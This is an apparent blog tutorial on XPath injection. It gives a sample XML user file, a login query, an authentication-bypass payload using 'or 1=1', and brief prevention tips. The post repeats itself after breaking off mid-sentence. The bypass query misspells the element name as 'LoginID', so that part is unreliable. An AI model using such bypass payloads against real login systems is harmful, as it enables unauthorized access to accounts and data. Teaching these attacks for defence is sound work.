XPath injection tutorial
X-path injection is a type of web attack which target a website that create XPath queries from user-supplied data. Querying XML is done with XPath, a type of simple descriptive statement that allows the XML query to locate a piece of information. By sending intentionally malformed information into the web site, an attacker can find out how the XML data is structured, or access data that he may not normally have access to.
XPath Injections might be even more dangerous than SQL Injections since XPath lacks access control and allows querying of the complete database (XML document), whereas many SQL databases have meta tables that cannot be accessed by regular queries.
Now i am going to give a demo of this.. It is similar to SQL Injection attack
See this user.xml file
<?xml version="1.0" encoding="UTF-8"?>
<users>
<user>
<firstname>Ben</firstname>
<lastname>Elmore</lastname>
<loginID>abc</loginID>
<password>test123</password>
</user>
<user>
<firstname>Shlomy</firstname>
<lastname>Gantz</lastname>
<loginID>xyz</loginID>
<password>123test</password>
</user>
<user>
<firstname>Jeghis</firstname>
<lastname>Katz</lastname>
<loginID>mrj</loginID>
<password>jk2468</password>
</user>
<user>
<firstname>Darien</firstname>
<lastname>Heap</lastname>
<loginID>drano</loginID>
<password>2mne8s</password>
</user>
</users>
Xpath query
//users/user[loginID/text()='abc' and password/text()='test123']
Now bypassing authentication in the query
//users/user[LoginID/text()='' or 1=1 and password/text()='' or 1=1]
See the link for detail demonstration.
link
Prevention
XPATH Injection can be prevented in the same way as SQL injection. Some of the
XPath injection tutorial
X-path injection is a type of web attack which target a website that create XPath queries from user-supplied data. Querying XML is done with XPath, a type of simple descriptive statement that allows the XML query to locate a piece of information. By sending intentionally malformed information into the web site, an attacker can find out how the XML data is structured, or access data that he may not normally have access to.
XPath Injections might be even more dangerous than SQL Injections since XPath lacks access control and allows querying of the complete database (XML document), whereas many SQL databases have meta tables that cannot be accessed by regular queries.
Now i am going to give a demo of this.. It is similar to SQL Injection attack
See this user.xml file
<?xml version="1.0" encoding="UTF-8"?>
<users>
<user>
<firstname>Ben</firstname>
<lastname>Elmore</lastname>
<loginID>abc</loginID>
<password>test123</password>
</user>
<user>
<firstname>Shlomy</firstname>
<lastname>Gantz</lastname>
<loginID>xyz</loginID>
<password>123test</password>
</user>
<user>
<firstname>Jeghis</firstname>
<lastname>Katz</lastname>
<loginID>mrj</loginID>
<password>jk2468</password>
</user>
<user>
<firstname>Darien</firstname>
<lastname>Heap</lastname>
<loginID>drano</loginID>
<password>2mne8s</password>
</user>
</users>
Xpath query
//users/user[loginID/text()='abc' and password/text()='test123']
Now bypassing authentication in the query
//users/user[LoginID/text()='' or 1=1 and password/text()='' or 1=1]
See the link for detail demonstration.
link
Prevention
XPATH Injection can be prevented in the same way as SQL injection. Some of the
- Input Validation
- Parametrized Queries
No comments:
Post a Comment